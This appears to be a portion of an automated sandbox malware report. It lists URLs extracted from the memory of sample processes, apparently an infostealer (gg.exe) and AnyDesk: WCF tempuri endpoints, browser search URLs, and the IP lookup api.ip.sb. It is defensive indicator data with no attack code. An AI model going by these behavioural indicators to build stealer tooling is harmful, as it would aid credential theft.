                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                                Source: gg.exe, 0000000E.00000002.1811038264.0000000003C2B000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000360D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000036B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002F4D000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003605000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000036B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003596000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000036B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1821468042.0000000004436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000360D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                                Source: AnyDesk.exe, 00000010.00000002.2893264351.0000000006E60000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2891388326.00000000047A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gimp.org/xmp/
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.opengl.org/registry/
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.openssl.org/)
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlEC_PRIVATEKEYpublicKeyparametersprivateKeyECPKPARAMETERSvalue
                                Source: gg.exe, 0000000E.00000002.1811038264.0000000003F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com
                                Source: AnyDesk.exe, 00000010.00000003.1663509478.000000000404F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1663596994.0000000004062000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1663258383.0000000004088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/company#imprint
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/contact/sales
                                Source: AnyDesk.exe, 00000010.00000003.1663509478.000000000404F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1663258383.0000000004088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/contact/sales)
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/de/datenschutz
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/en/assembly
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/en/assembly/terms
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/en/changelog/windows
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/en/privacy
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/es/privacidad
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/order
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/pricing/teams
                                Source: AnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1663258383.0000000004088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/pricing/teams)
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/privacy
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/terms
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://anydesk.com/update
                                Source: SysrI6zSkJ.exe, 00000000.00000002.2883966376.00000231D8F00000.00000004.00001000.00020000.00000000.sdmp, embedded.exe, 00000007.00000002.2884514638.000001A0BAD00000.00000004.00001000.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000000.1640888434.00000000007A2000.00000002.00000001.01000000.00000007.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://boot.net.anydesk.comabcdefABCDEFtruefalsetfInvalid
                                Source: gg.exe, 0000000E.00000002.1811038264.0000000003F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                Source: gg.exe, 0000000E.00000002.1811038264.0000000003F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                Source: gg.exe, 0000000E.00000002.1811038264.0000000003F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                Source: embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://dartbug.com/52121.
                                Source: SysrI6zSkJ.exe, 00000000.00000000.1626990978.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2892782013.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2888383971.00000231DAA00000.00000004.00001000.00020000.00000000.sdmp, embedded.exe, 00000007.00000000.1634535755.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp, embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://dartbug.com/52121.enable_deprecated_wait_fordart::../../runtime/vm/dart_api_impl.ccNewErrorN
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1524/
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1526/
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1914/
                                Source: gg.exe, 0000000E.00000002.1811038264.0000000003F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                Source: gg.exe, 0000000E.00000002.1811038264.0000000003F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                                Source: gg.exe, 0000000E.00000002.1811038264.0000000003F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                Source: embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/dart-lang/sdk/blob/master/runtime/docs/compiler/aot/entry_point_pragma.md
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://help.anydesk.com
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://help.anydesk.com/
                                Source: AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://help.anydesk.com/$
                                Source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://help.anydesk.com/HelpLinkInstallLocationAnyDesk
                                Source: AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://my.anydesk.com
                                Source: AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://my.anydesk.com/
